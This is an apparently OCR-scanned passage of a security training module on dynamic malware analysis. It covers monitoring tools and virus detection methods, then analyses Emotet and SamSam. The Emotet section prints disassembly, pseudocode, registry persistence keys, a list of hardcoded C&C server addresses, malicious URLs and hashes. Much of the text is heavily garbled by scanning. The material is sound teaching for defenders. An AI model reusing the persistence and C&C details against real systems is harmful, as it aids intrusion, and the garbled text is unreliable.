malwareactivity.It helpsto determine packets
the typeof traffic/network or data
transmittedacrossthe network.
Malware depends downloading
on the networkfor various activities suchas propagation,
maliciouscontent,transmitting andoffering
sensitive filesandinformation, remote controlto
attackers.Therefore,you should
adoptthat
techniques can detectmalwareartifactsand usage
across networks,Some malwareconnects backto the handlers
Informationto them
and sendsconfidential

Indynamic analysis,
you run a pieceof malwarei n a controlledenvironment that is installed
with various network monitoring tools to trace all the networkingactivities of the malware.
Network monitoring tools such as SolarWindsNetFlowTraffic Analyzer, Capsa Network
Analyzer, andWireshark, can beusedto monitor and capture livenetworktrafficto andfrom
thevictim'ssystem during execution of the suspiciousprogram. Thiswill helpto understandthe
malware’snetworkartifacts,
signatures, functions,andotherelements.
=
NetFlowTraffic
SolarWinds Analyzer
Source:https://www.solarwinds.com
NetFlowTrafficAnalyzer
collectstraffic data,converts it into a useableformat,
and
it to theuser in a web-based
presents interface
formonitoring
networktraffic
Features:
©

©
Network
traffic
analysis
Bandwidthmonitoring

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Application
trafficalerting
analysis
Performance
€BQ0S
policy
optimization
9

Malicious
malformed
traffic
or flowidentification

Nettiow
Analyzer
Tete
Summary
Natronures Top1 0Agplations

Figure
790:Sreenshot
of SoarWinds
NetFlowTraficAnalyzer
Someadditionalnetworkactivitymonitoring
toolsare as follows:
NetworkAnalyzer
Caspa (https://www.colasoft.com)
=
(https://www.wireshark.org)
Wireshark
=
NetworkMonitor (https://kb,paessler.com)
PRTG
(https://www.afi.com)
GF LanGuard
(https://www.netfort.com)
NetFort LANGuardian

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DNSMonitoring/Resolution
MalwareAnalysis:
Dynamic
(©nschanger
ofhanging isa
malcous
sofware
capable
atackers
control
ofthe
theese ONSserver atte
roves the wth the
and
DNSQuerySniffer
a networkane
DNSQuerySaileris uty thatshowstheDNS

very the ONSservers

DDRSGuerySniferto that
themaiware testo connect fo ad erty he

DNS
RSs
Monitoring/Resclution
(tas //mendstcom)
Tools,
Sonake tntps/feonstebcom)

DNSMonitoring/Resolution
Malicioussoftwaresuchas DNSChanger can change the system's DNSserver settings,
thus
providingattackerswith controlof the DNSserver usedi n thevictim'ssystem. Subsequently,
theattackerscan controlthe sitesto whichthe user tries to connect throughthe Internet,
make
him/herconnect to a fraudulent or interfere
website, with his/heronlineweb browsing
Therefore,you shoulddeterminewhetherthemalware of changing
i s capable any DNSserver
settingswhile performing
dynamic analysis.
You can use tools suchas DNSQuerySniffer
and
DNSstuff,to verify
connection
the DNS
serverstriesto identify
thatthemalware to connect and the typeof

=
DNSQuerysniffer
Source:https://www.nirsoft.net

DNSQuerySniffer
is a networksniffer
utilitythatshowsthe DNSqueriessent on your
system.Forevery DNSquery, the following informationis displayed: host name, port
number,query ID,request type(A,AAAA, NS,MX,and so on},requesttime, response
time,duration,response code,numberof records, and content of the returnedONS
records.You can easilyexport the DNS query informationto a CSV/tab-
delimited/XML/HTML file or copy the DNSqueries to the clipboard
andthen pastethem
into
Excel applications.
or otherspreadsheet

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IHW
ONSQuerySifer
file fst
theme,
View
-
Options
Help
eatekPC GBE
Family
Controller

°
Host Name
Request
@toginmicrosottontine
Queryi0 ypeRequest
Time Response
Tam
019321

2
© 1" 2.
loginmierorttonine
sutheveteamemicros
:

2019321
0193.22

222
9

@suthoveteamsmicrs.
©
Que T2019

vs-spiazmskypecom
usapiasmasypecom
2 gomicroste
com
@gomicrosttcom
@ma metasenices mi
2
2019322

©
amametacenices

beaconsgr2.com
@
@bescons.gt2.com
A
019322
ote

19527217172in-ade

Figure791:SereenshotofONSQUerySniffer
ONSmonitoring/resolution
Someadditional toolsare as follows:
DNSstuff (https://www.dnsstuff.com)
+
DNSLookup
Too!(https://www.ultratools.com)
Sonar Lite (https://constellix.com)

Module
7 1021
Page tical andCountermensores
Making by Comet
Copyright©
 MalwareAnalysis:
Dynamic API Calls Monitoring

OS
1@Appletonprogramming
trices (AP)
‘ofthe
Windows thatslow externalppeaons APIMonitor

AnayingtheAP eal mayreveal

thesuspected

KPICalls Monitoring
Application
programming interfaces(APIs)
are partsof the WindowsOSthat allow external
applications
to access OSinformation suchas file systems,
threads, kernel,
errors, registry,
buttons,
mouse pointer, web,andthe Internet. Malwareprogramsalsouse
networkservices,
theseAPIsto accessthe OSinformationandcausedamage to thesystem,

the
Youneedto gather APIsrelatedto the malware programsandanalyze
interaction withthe OSas well as the activities theyhavebeenperforming
themto revealtheir
over the system.
Use
APIcall
=
monitoring
tools
Monitor
API
to API
suchas APIMonitor monitor callsmadebyapplications.

https://www.apimonitor.com
Source:
‘API
Monitor is a
by applications.
information, including
monitor
display
softwarethat allowsyou to
displays
It can trace any exported
and
API and it
Win32 API callsmade
a wide range of
function name, call sequence, inputand outputparameters,
functionreturn value,etc. It is 2 usefuldeveloper tool for understanding
howWin32
applications
workandfor learning theirtricks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 vel sed ve

7.92:Screenshot
Figure of A P Monitor
Someadditional toolsare as follows:
APImonitoring
=
(https://opimetrics.io)
APImetrics
(https://www.runscope.com)
Runscope
=
Alertsite(https://smartbear.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Virus DetectionMethods

|©
Checkingproducts
|~forte by
eaing
enti letgry
tiesandayem
Integelty logy
that
a3 cheng work
score
the ik n d racrdng dt st centre

|
InterceptionTheinercepter
mentors theoperating system requests
thatate writen theok

Code
Emlation
rd
edmeraracai
et
polymorphs the itu
indeaingwtheneyted

Ha Frac
owrstie

VirusDetectionMethods
Theruleof thumbfor virus andworm detectionis that if an emailseems suspicious(i.e,if the
an e-mail
Useris not expecting fromthesenderanddoesnot knowthesender), or if the email
headercontains something that a knownsenderwould not usually say, the user must be
carefulaboutopeningthe email, astheremight
bea riskofvirus infection.
The MyDoom andW32.Novarg.A@mm
worms haveinfected of manyInternet,
the systems
Users,mostly
through
e-mail
‘The
+
for
bestmethods
Scanning
virus detectionare as follows:

+
Integrity
checking
Interception
*
CodeEmulation
+

Heuristic Analysis
a combination
Furthermore, ofthesetechniques
can bemore effective.
+
Scanning
A virus scanner is an essentialsoftwarefor detecting
viruses. In the absenceof a
scanner, itis highly
likely
that the system
will be attacked
bya virus. Run antivirus tools
continuously
and update
the scan engineand virus signature
databaseon a regular
basis,Antivirus softwareis of no use if it does not knowwhat to lookfor. Thescanning

for
virus detectionis performed in the ways
following
ical andCountermensores
Mackin ©by E-Comel
Copyright
 a cross the globe
Oncea virus is detectedin the wild,antivirus vendors identify
its
signaturestrings(characteristics).
The vendors start writingscanningprogramsthat look for the virus’ssignature
strings.
Theresultingnew scanners search
ofthenew virus.
strings
memory filesandsystem
for
sectors the signature

The scanner declaresthe presenceof the virus once it findsa match.Onlyknown

andpredefined
viruses can bedetected.
Somecritical of virus
aspects scanning
are as follows:

Viruswriters oftencreate manynew viruses byaltering existingones. It maytakeonlya

shorttime to create a virus that appears new butwhichis actually
justa modificationof
an existingvirus. Attackers makethesechanges frequentlyto confusescanners.
In addition,
to enhancesignature recognition,new scanners use detectiontechniques
suchas code analysis. Beforeinvestigating the codecharacteristics of a virus, the
scanner examines the codeat various locations file.
i n an executable

‘Some
scannersset up a virtual computer RAMand test the programsby
in a machine's
them i n thisvirtual space.Thistechnique,
executing calledheuristicscanning,can also
checkand remove messages that mightcontain a computer virus or other unwanted
content.

‘Advantages
ofscanners
can check
They programsbeforeexecution
©. They
Drawbacks
re the
easiest
of scanners
way to checknew softwarefor knownor
malicious
viruses.
© Oldscanners maybeunreliable.Withthe rapid
can quickly
market.
increase i n new
viruses,
old scanners
becomeobsolete.It is bestto use the latestscanners availablein the

Becauseviruses are developed more rapidly

compared to scanners for combating
them,even new scanners are not equipped
to handleevery new challenge.
Integrity
Checking
checking
© Integrity perform
products their functions by reading
and recording
integrated
datato develop or baselinefor thosefilesandsystem
a signature sectors
A disadvantageof a basicintegritycheckeris that it cannot differentiate file
causedbya bugfromthatcaused
corruption bya virus,
checkersavailableforanalyzing
Thereare some advancedintegrity and identifying
the typesof changes
madebyviruses.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Someintegritycheckers combineantivirus techniqueswith integritychecking
to
create a hybrid
tool.Thissimplifies
the virus checking
process.
Interception
©. Theprimary of an interceptor
objective logic
is to deflect bombsandTrojans.
Theinterceptorcontrolsrequests to theOSfor networkaccessor actionsthat cause

to
threats programs.If it findssucha request,
toallowthe requestto continue.
it popsup andasksif the user wants

Thereis no reliableway to intercept

direct branchesto low-levelcode or direct

©
for
input
instructions and byvirus.
outputinstructionsthe
Someviruses can disablethemonitoring
programitself.
CodeEmulation
Using
codeemulation,
antivirus softwareexecutesa virtual machineto mimic CPUand
memoryactivities. Here,virus codeis executed o n thevirtualmachine insteadof the
real processor. Codeemulation efficiently deals with encrypted and polymorphic
viruses. After theemulator i s run fora longtime, the decrypted
virus body eventually
presents itselfto a scanner for detection.It alsodetectsmetamorphic viruses (single
or
multiple encryptions). A drawbackof codeemulationis that it is too slow if the
decryption loopis verylong,
HeuristicAnalysis
Thismethodhelps i n detecting
new or unknownviruses that are usually variants of an
already existingvirus family.Heuristicanalysis can be static or dynamic. In static
analysis, the antivirus tool analyzes
the file formatandcodestructure to determineif
thecodeis viral.In dynamic analysis,
the antivirus tool performs codeemulationofthe
suspiciouscodeto determineif the codeis viral. Thedrawbackof heuristicanalysis is
that itis proneto too manyfalsepositives (i.e.,
it tagsbenign
mightmistrust a positivetest resultand mistakenly
attackoccurs.
as
code viral);thus,a user
assume a falsealarmwhena real

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Trojan Emotet
Analysis:
| Totes
boning
Ton
which
an
ection bath ar jon yi of ter
banking ole

e e Orson P | ttm
ern

°
‘Targets

‘Trojan Emotet
Analysis:
Source:https://www
fortinet.com

Emotet is a malwarethat is designed

revolutionary with a modulararchitecture,
wherethe
a re installed
main programs firstbeforethe delivery payloads.
ofother Itis alsoconsideredas a
dropper,
a downloader, analysts.
anda Trojanbysecurity It is a polymorphic malware,
as it can
change
its own identifiable so that it can eludesignature-based
featureswhen downloaded
detectionandother antivirus programs. Emotetis usually
a banking Trojanthat can function
bothas a Trojan byitselfor as the downloaderand dropperof other banking Trojans.It has
beenemployed as a dropper/downloader for well-knownbankingTrojans suchas ZeusPanda
banker,Trickbot, andIced1Dto infectvictims globally.Although it is a Trojan,Emotethas
advancedpersistence techniques and wormlike self-propagationabilities,
which make it
uniquelyresilientas a destructivemalwarethat couldjeopardizeindividuals,companies, and
government
entities
globally
Propagation
spreads
Emotet usually through documentfiles,malicious
maliciousscripts,macro-enabled
and spamemails(malspam).
links, It can run on portnumbers20,22,80,and443.Emotetc an
persuade
victims to clickmaliciouslinksusingeye-catching
captionssuchas “Your
Invoice―
and
“Payment Early
Details.― versions of Emotetarrivedas a maliciousJavaScript
file.Thelatest
use macro-enabled
versions the maliciouspayload
documentsfor retrieving from command-
(C&C)
and-control byattackers.
servers controlled

ical andCountermensores
Mackin ©by E-Comel
Copyright
EmotetMalwareAttackPhases
Thevarious phases
and corresponding
stagesInvolvedin an Emotetmalwareattackare as
follows:

Infection MaintainingPersistence
© wrcincccin
|QOirrnasaans

System
Compromise

i I |
Figure7.93:
Emotet infection low
pracess

il an Countermeasures
Macking oy recounet
 EmotetMalwareAttackPhases:InfectionPhase

InfectionPhase
‘=
Stage
1:
Initial
Infection
Initial infection occurs through macro-enableddocumentfiles,
maliciousscripts,
malicious links,andspamemails.Thespamemaili s sent to thevictim with a malicious
URLand it is disguised as a legitimate
email, luring
thereby the victim into clicking
the
link

an official confirmation for

It’s
your order.
Pleasecheck the invoice to
updateyourstuff shipping
day.
Passwordto access Involce:722

7.94:
Figure Spamemail
wth malicious content istributingEmotet

ical andCountermensores
Mackin ©by E-Comel
Copyright
 2: Malicious
Stage .docFileDownload
When thevictim clicksthe link,i t redirectsto downloada maliciousdocfile. Thus,the
Emotet malwareenters the victim’s systemand startsits attacking process.Theoriginal
filename of the infected documentis PAY09735746167553.doe and it contains
maliciousV BAcode (Visual Basicfor Applications)i n a macro. TheVBA codecomes as
partof the maliciousMSOfficedocument.Assoon as the macrosare enabled, the code
executesi n the background, ThemaliciousV BAcodeis automatically executedusingits
"autoopen―function once a victim clicksthebutton“Enable Then,
Content―. aftersome
time,it generates a ton of PowerShell codeand executes it. TheactualEmotet file is
downloaded fromthe generated PowerShell codefromseveralURLs, whichis generated
dynamically

asa.

7.96: and cade

Figure Emotet
downloaded executed
inPowershell

ical andCountermensores
Mackin ©by E-Comel
Copyright
 EmotetMalwareAttackPhases: Persistence
Maintaining
Phase

fo fier
Mimcrnnppoctat\cuteuessuece\

Emotet Malware AttackPhases:Maintaining

Persistence
Phase(Cont'd)

re6: €:
Deploying
Timer
Func
‘Stage
Encryption. Stage
(©Asings
Abts
|| motte
andallimported
encrypted
SetTimarto
enable
the
@
Windows ussthe AP

once12 Tiscallback
fonction ead evry 1000mieconds

Maintaining
PersistencePhase
‘=
3: EmotetRelocation
Stage andCreationof Firstculturesource.exe
Bydefault,
Emotetmalwarewill be downloadedi n the stempsfolder.Whenit runs,it
comparesthe file pathof the current process,and if it is not the same as
SLocalAppDatat\culturesource\culturesource.exe, it moves the original .exe file
fromthe tempt folder to the previousfolder mentioned,
and the file is renamedas

ical andCountermensores
Mackin ©by E-Comel
Copyright
 culturesource.exe. is a constant stringdecrypted
The word“culturesource― from
memory.
TheAPISHFi1eoperationk is calledto perform
the file relocation.ThisAPI is calledi n a
timer callback
function,whichwe shalldiscusslater.Therelated assembly computer
language(ASM) codesnippetis as follows:
bed
002FFB9Aloc_2FFBOA: 1} CODExREF:
‘sub_311D78+1F3
002FFBSA call ds:memset
OO2FFRAO call aub_2F1250 sCreateDirectoryW
OO2FFBAS push 1Bh
OO2FFRAT lea eax, [ebp-20h]
OO2FFBAA push edi.
OO2FFBAB push eax

OO2FFBAC call ds:memset

Oo2FFEB2 add esp, 16h
Oo2FFBBS mov dword ptr [ebp-1Ch],1; FO_MOVE.
OozFFRRC lea eax, [ebp-20h] SHPILEOPSTRUCTA
} structure
0O2FFBBF mov dword ptr [ebp-18h],offset unk 3083F8 current
file path in stemp?folder.
OO2FFBC6 mov esi, OFI4K
;

;
OO2FFECR mov dword ptr [ebp-14h],offset
‘LocalAppoatat\culturesource\culturesource..exe
word_307EE0 ;

o2FFED2 mov [ebp-10h], si

OO2FFED6 push eax

002FFRD7 call ds:SHFileoperation
OO2FFEDD test eax, eax
ozFFEDF jnz short loc_2FFBEA
OO2FFBE emp —_[ebp-OEh],
edi
OozFFBEd
bed
jz loc
2FFCAO
Stage 4: CreationofSecondculturesource.exeandObfuscation
Thisis the main functionof the Emotetmalwareattack, wherethe developers try to
obfuscatethe codebyadding a large
amount of unusedtext so that the original
codeis
securely
concealed.
In the previousstage,
we haveseen that the first culturesource.exe is relocatedand
executed; the secondcul turesource exe file is employed
i n this stage, for performing
the majorexploitation functions
of Emotet.Whenthe secondculturesource.exe file

Modul
7 1034
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
starts runningnormally,the firstone exits. Now,Emotetdynamicallyreleases codeand
the relateddata into memory blocks.Here,most of the functionsare splitinto several
partsto increasethecomplexity ofthe codeanalysis.
Asshowni n the screenshot below,
a normalfunction is splitinto seven parts,all of whichare connectedusing “3mp

tomcode
instructions,
ake more
analysis difficult

5:
Stage Encryption
797:A
Figure
normal
funetion
spitintoseven parts

Al the stringsa re encrypted

andthen decrypted beforebeingusedduring r un time. All
imported API are alsoencryptedanddecryptedat thebeginning
oftheirexecution.
Thescreenshot a string“user32.411―
belowshowsa codesnippetthat decrypts from
“unk_3031F0",
It callsthe APE LoadLibraryto load“user32.d12―
andthen uses the
APIinformation
decrypted to findthe exported
APIsin the module“user32.411―

ical andCountermensores
Mackin ©by E-Comel
Copyright
Stage
6: Deploying
Figure
Timer Function
798:Derypted a ndloaded
string
APfromuser32

Emotet alsouses a WindowsTimer Event to execute its code.Here,it directlyuses the

timer callbackfunction.Whenit callsthe API SetTimer,it sets the interval time to
1000. Thismeans that the callbackfunctionis calledonce every1000 milliseconds.The
pseudocode
of thiscallbackfunctionis givenbelow.
void __stdeallTimer_fun(int al, int a2, int a3, int ad)
fi
unsignedint va: // esia6
intv5; // eaxeé
unsignedint v6; // esigis
int v7; // eaxe1s
int v8; // esia1é
int v9; // eaxeié
Af <= (unsigned
( qword_307¢94 __int64)(unsignedint)GetTickcount() )
‘
‘switeh( HIDWORD(qword_307¢94)
)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 case 1
HIDWORD(qword_307¢94)
0; =

check_
ie
‘eub_2F6BA0()
‘
Af process_is_in correct
goto LABEL_7
_path() )
eub_2F7170()

v4 =
GetTickCount() ©OxBBau;

()
HIDWORD
=
GetTickcount

(qword_307¢94) =
2;

LODWORD
(qword_307¢94)
break
= va + v5 + 3000

case 2

HIDWORD
Af(qvord_307¢94)
( sub_2F8300()
6 sub_2F8430()
4&6 sub_2F8820()
G6 sub_2Â¥9580()
6 sub_2FA320()
66 sub_2FB750()
46 sub_2F6800()
)

dword_307¢C4
(int) Gunk_3080E8;
=

aword_307CC8
dword_307CcC
106; =
(int) sunk_303430;
=

= ():
V6
v1 =
GetTickcount()
GetTickCount
+ oxBBBu,

RIDWORD
(quord_307¢94)
=
LODWORD
(qvord_307C94)
=
3
v6 + v7 + 3000;

(quord_307¢94)
BIDWORD
,
break
case 3
(qvord_307¢94)
HIDWORD
v8
v9 = =
GetTickcount()
sub_2FCB20()
ical andCountermensores
Mackin ©by E-Comel
Copyright
 HIDWORD
(qvord_307C94)
LODWORD
(qword_307C94)
=

=
3,
v9 + v8
break
care 4
SetEvent (dword_304c0C)
break:
default:
return,

In ease 0, one of its purposes is to relocatethe process to the expected positionwith

the filename that was discussed i n stage3. Furthermore, i n ease 0, it is alsocodedto
collectsystem informationsuchas computer name,file system, andvolumebycalling
severalAPIs,andthe dataare sent to theC&Cserver. Thiswill bediscussed 7.
i n stage

‘Another
purposeis to set up a Windowsservice named“culturesource―
for running
Emotetat Windowsstartup,whenit can open the ServiceControlManager successfully
(bycalling
the API openscManager#).Meanwhile, is movedto
“culturesource.exe―
the folder “swindixt\aystem32―.

whose types “Automat

Startup

ical andCountermensores
Mackin ©by E-Comel
Copyright
In the abovecodesnippet:
Case1 is usedto initializeseveralDLLmodulesand decrypt
the exported APIfunctions
Emotet
that uses, including

the
"uelmon21, ‘wininet .dl1," andso on.

Case2 is the main branch.It collectsdatafrom victim’s sends

system, thedatato its
server,
C&C

Duringthis stage,
server.
andexecutes commands fromthe C&C
usingtwo methods:the system
Emotet maintains persistence service

following
and the auto-run in the systemregistry.Emotetcreates the auto-run entry
named“culturesource― under the sub-keys i n the systemregistryto maintain

andthe after
reboot:
persistenceaccess victim’s
machine
even

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVers
©

© RREY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\Cu
sion\Run

tware\Microsoft
HKEY_CURRENT_USER\Sof \Windows\CurrentVersion\Run

7.201:
Seeenshot
Figure ofthe addedauto-un entry “culturesource―
inthe Registry
Eltor

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Emotet MalwareAttackPhases:
System Phase
Compromise

thecontapous
pois

Akerreceing
‘parades
themales
instructions
ofthe
o males pao rm he males CRsre,
tel an prfoms exploitation system
otek

System Phase
Compromise
=
Stage 7: Communication with C&CServer
In stage 6,i n case 0, it is codedto callseveralAPIsandcollectthe system
information
suchas computer name, filesystem, andvolumebycalling the APIsGetComputerNamew
and GetVolunernformationw. It putsthe two data sets togetherand saves them i n a
slobal whichis usedin theC&Cserver as theIDforthisvictim. ThisID willthen
variable,
beusedin the packets that communicatewith the C&Cserver. Emotetthencalculates a

of
CRC32its EXEfileandsaves it in another
the first packet
to theC&Cserver.
global whichis usedwhensending
variable,

It also calls “Re2Getvereion―

to obtain the Windowsversion information and
“GetNativesysteminfo―
to gather andCPUinformation.
system Furthermore,
it picks
a
DWORDvalueat offsetox1D4 of PER,whichis definedas SessionID.
Emotetcontinuesto
collectthe names ofrunningprocesses bycallingthe APIsCreateToolhelp32snapshot,
Process32FiretM,andProcess32Next.
Thenext stepis to put all the collecteddata together into a structure and encryptthe
entire data set. After the data are encrypted,
it is encodedusingBase64. Moreover, it
then disguises
andencrypted information will betransferred to
the Base64codeas a cookievalueof an HTTPheader avoiddetection,
Then,all thiscollected to theC&Cserver.
Thescreenshot belowshowsthatthe datahavebeencopied into a structure. Thevalues
i n red rectangle are flags that indicatewhatthe following data are. The stringbehind
“12―
Is the computer name,thedatabehind“18―is the native system information, and
the byte after “20―
is the SessionIDfrom PEE. The DWORDvalue next to “2p― is the
CRC32 valueof Emotet, the stringfollowing
“32―
is the collectedprocess n ame list,and

ical andCountermensores
Mackin ©by E-Comel
Copyright
thevaluewitha blueunderscorei s thelength
of the following
data,whichusesa typeof
UTE-8encoding.

Put
data
Figure7.102:
intogether a structure
After receiving the transferredinformationfromthe infectedvictim’s machine, the C&C
server checks if there are analysis
tools(sucha s Wireshark anddebuggers) runningon
the victim’s machine.If any suchtools are detected, it will not replywith any data’
otherwise, it will provide the required
maliciousinstructions anddeploy the contagious
payload. As can be seen in the screenshot, the C&Cserver replies with the instruction
data,

Figure7.108:
Send
data
to
collected

ical
CBC
server

andCountermensores
Mackin ©by E-Comel
Copyright
 TheIP list of C&Cservers is hardcodedinto its memoryandsavedin a global variable,
EachIP and portpair uses 8 bytes, and there are 62 C&Cservers i n total. Thelist of
hardcoded
i>
IPand
72,91.161.118port
is as follows:

:: 22
02> 70.164.196.211 995
03> 175.101.79.120
04> 187.233,136.39 :: 80
143
05> 5,107.250.192
06> 50.224.156.190 :: 995
8080
07> 5.107.161.71
08> 186.179.243.7 :: 993
995
09> 72.240.202.13
10> 190.215.53.85 ::
80
443

11> 133.242.164.312
32> 115.71.233.127 ::
7080
443,
13> 69,136,227.134
1d> 216.49,114.172 :: 22
443

:::
15> 153.121.36.202 7080
16> 181.119,30.27 995
17> 710.164.196.211 20

:;:
18> 98.157.215.153 80
19> 62.75.187.192 8080
20> 189.234.165.149 8080

:::
21> 154.72.75,82 20
22> 45.123.3.54 443
23> 217.13.106.160 7080
24> 75.99.13.124
25> 198.74.58.47 : :
7080
443
26> 69.195.223.154
27> 172.114.175.156 :: 7080
8080
28> 73.124.73.90 : 20
29> 74.80.16.10
30> 24.11.67.222 : :
80
443

:::
31> 181.143,53.227 21
32> 173.76.44.152 20
33> 208.78,100.202 6080

:::
34> 47.44.164.107 993,
35> 45.63.17.206 2080
36> 50.31.0,160 8080

7
Module 1082
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 37> 62.75,191.231
38> 98.142,208.27 ;: 8080
443
39> 78.187.172.138
40> 67,205,149.117 ::7080
443,
41> 98,186.90.192
42> §.230.147.179 :: 443
8080

;:;
43> 50,240,162.242 995
44> 94.76.200.114 8080
45> 178.62.37.188 443

:::
46> 83.222,124.62 8080
47> 70.184,83.93 20
48> 173.255.196.209 8080
49> 208.107.230.235
50> 186.179.80.102
: :
20
443,
51> 72.95.118.97
52> 162.250.19.59 :: 22
80

:: :
53> 134.129.126.86 443
54> 69.198.17.7 8080
55> 8.17.46.42 53

:::
56> 70.90.183.249 7080
57> 47.149.54.132 8080
58> 200.116,160.31 80
59> 175.143.84.108
60> 178.254.31.162 ;:
50000
8080

::
61> 175.110.104.150 20
62> 211.115.111.19 443

Stage
8: System
Compromise
After receivingthe maliciousinstructions or maliciouspayloadfromthe maliciousC&C
server, Emotetupgrades itselfandexploits In this stage,Emotetactually
the system.
compromisesthevictim'smachine.

7
Module 1082
Page ical andCountermensores
Mackin
©by E-Comel
Copyright
 Emotet MalwareAttackPhases:
NetworkPropagation
Phase

Stage
9: Network Propagation,
(©
Ate infecting

(©
thevicki’
system, second kay
Emote’

spreader
Emoteuse ve known
currently, modules
goals tospreadtheinfection
aros
local
networks

Emotet
allsome
employsor
network ofthese
network target
machine modules
propagation onthe
depending and

‘Network Phase
Propagation
=

9:
Stage NetworkPropagation
After infecting
thevictim'sdevice, next keyobjective
Emotet’s is to spread
the infection
across local networksand beyond as many machines
to compromise as possible
Currently,
Emotet uses five knownspreader
modules:NetPass.exe,
OutlookScraper,
WebBrowserPassView, anda credentialenumerator.
Mail PassView,
©

passwords ~
NetPass.exeIt is a legitimate
utilitydeveloped byNirSoft.It recovers all network
storedon a systemfor the current logged-on
recover passwords
user. Thistool can also
storedin thecredentialsfile of externaldrives.
Outlook ScraperIt ~
is a tool that extracts names and emailaddresses
from the
victim'sOutlookaccount and usesthisinformation phishing
to sendout additional
fromthe compromised
‘emails account.
WebBrowserPassViewIt is a password
~

passwords
recovery tool that captures
storedbywebbrowserssuchas Internet Explorer, Google
MozillaFirefox, Chrome,
Safari,
andOpera.
It can passthemto the credentialenumerator module,
Mail PassView It is a password
~

recovery
tool that revealspasswords
detailsfor various emailclientssuchas Microsoft
Thunderbird, Hotmail,
Yahoo!Mail,and Gmail,
and account
Outlook,WindowsMail,Mozilla
and passesthem to the credential
module.
‘enumerator
CredentialEnumerator It is a self-extracting
~
RARfile containing two components.
is the bypass
‘One component, andthe other is the service component. Thebypass
component is usedfor the enumeration of network resources, and it elther finds
writablesharedrivesusingthe Server Message Block(SMB) or tries to brute-force

ical andCountermensores
Mackin ©by E-Comel
Copyright
 User accounts, including
the administratoraccount. Oncean availablesystemis
found,Emotetwrites the service component
on the system,
whichwrites Emotet
onto thedisk.Emotet’s
accessto SMBcan resulti n theinfection
of entire domains
(servers
employs
Emotet
some
andclients).
or all of thesenetworkpropagation depending
techniques
on
the
targetmachineand network.After infecting machinesin the network,
the possible
Emotet phases
performs
the same as those discussedabove to compromise the
machines.
(10C)
Indicatorsof Compromise for Emotet:
ThismaliciousWorddocumenthas been detected as “VBA/Agent.AFD!tr.dids―
and the
original
Emotetfilehasbeendetected
a s “W32/Enotet.GBUK!tr―
bythe FortiGuard
AntiVirus

=
URL
//muathangnhom.
"“hexp: com/6DOpkn0L9_yf0"

:///gnevietnam.
“hexp: vn/abMbIaT2HsDkAq―
hexp / augoclub.sk/yCq4xkYzeqAgK_v"
/foreprojects.webedge.com.ng/Le3UYxXyQixx_Dp’
huxp:
://evonline. Liceoriosdechile..com/NpDgofVhpankbq_18AaJbz93"
“hexp
‘Sample
SHA256
PAY09735746167553..doc:

1194bab2c4aGe63e59e£01
Emotet/Original
Downloaded
6da30e713¢2
Exefile:

‘7¢5cDC5B738F5D7B40 40F2CCOA730B61845B45CBC2A297BEE2D9506S7CABESS

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Virus SamSamRansomware
Analysis:

ansorware
employs
Protea!
Propagation paste
weak
password
ofRemote
estoy
Samsam
ROP)
toga azn
ute ore ats
the
the

Encryption oar cote tectd ions

‘Virus SamSamRansomware
Analysis:
Source:https://www.secureworks.com
SamSam ransomware is alsoknownas Samasor SamSamCrypt. It is a notorious ransomware
that is associated with theGOLDLOWELL threatgroupforperforming targeted attacksagainst
global multi-nationalcompanies.It exploits vulnerableunpatched servers present i n the target
networkusinga rangeof exploitation methods. SamSam ransomware attacksskyrocketed in
2018, although the ransomware was developed andreleasedi n 2016.In 2018, it was shrewd
enough to capture wide mediaattention to targeta specific rangeof top-class organizations
across the globe. Unlikeother ransomware, this ransomware doesnot attackthe victims on a
randombasis. It is a targeted ransomware that specifically targetscertain reputed companies.
In spiteof knowing this, largemulti-nationalcompanieswere unableto defendthemselves
againstthis attack. This ransomware not onlyaffected the operationsof government
organizations, schools, and the healthcaresector but also affected common people by
encrypting their crucialmedicalrecordsrequired for proper diagnosis. As with any other
ransomware, after infiltrating into a system, it encrypts the filesand prevents the users from
Usingthosefiles until a heavy ransom is paid i n bitcoins.Thisransomware does not have a
specified ransom pricing,After infecting systems, theattackersdemanda ransom depending on
the typeof victim.
Propagation:
Nearly andperform
all ransomware usesspamemailsto propagate attacks;
however,
SamSam
ransomwareemploysbrute-forcetactics againstweak passwordsof the RemoteDesktop
Protocol(RDP)
to gain access to the victim’s
machine.Oncethe targethost is infected,
it
performs
networkmapping to searchfor otherexploitable
assetsi n the network.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Encryption:
SamSamadoptsthe RSA-2048asymmetric technique
encryption to encryptlocal files i
infectedsystems.
Symptoms:
A ransom note appearso n the screen,demanding
a ransomin bitcoins.
Structure:
‘The
SamSamransomware following
consistsof the components:
=
mainly
Batchfile: Thebatchfileis responsible themalware.
for executing
=
Runner:The runner tries to perform
component andthe payload
decryption, is then.
executed.
Decryptor: It tries to decrypt
the payload,
whichis placed
i n a separateDLLfile. Then,
the keywill begenerated fromthe password
providedbythe attackers.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SamSamRansomwareAttack Stages

== e

PosBpotation ‘Beplitation
@ eo

Modul
7 1088
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
SamSamRansomware
Attack Stages
(Cont'd)
etch
Sorpt
Sarafam
payloe
Exploitation Deploying chartcter.eme)

(8
Alter
gaining
access
to
‘atch fle (at eee
alle

on ery

© detereor detlerype
exe
(SDelete
Syinternal
rogram)
©

slide
(used one
mmabcovs sett)
to delete
ts

SamSamRansomwareAttack Stages
(Cont'd)
Exploitation
(Cont'd)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SamSamRansomware
Attack Stages
(Cont'd)
Post
Exploitation

anBoi
1 8 rethenaplays HTML

that
(Ransom
rmessoge
‘stem
e xtortion

mount
Not) ontheVito's
demands

SamSamRansomwareAttack Stages
SamSam
ransomware attacksoccur in threephases:
=
Pre-Exploitation
Phase
=
Exploitation
Phase
=
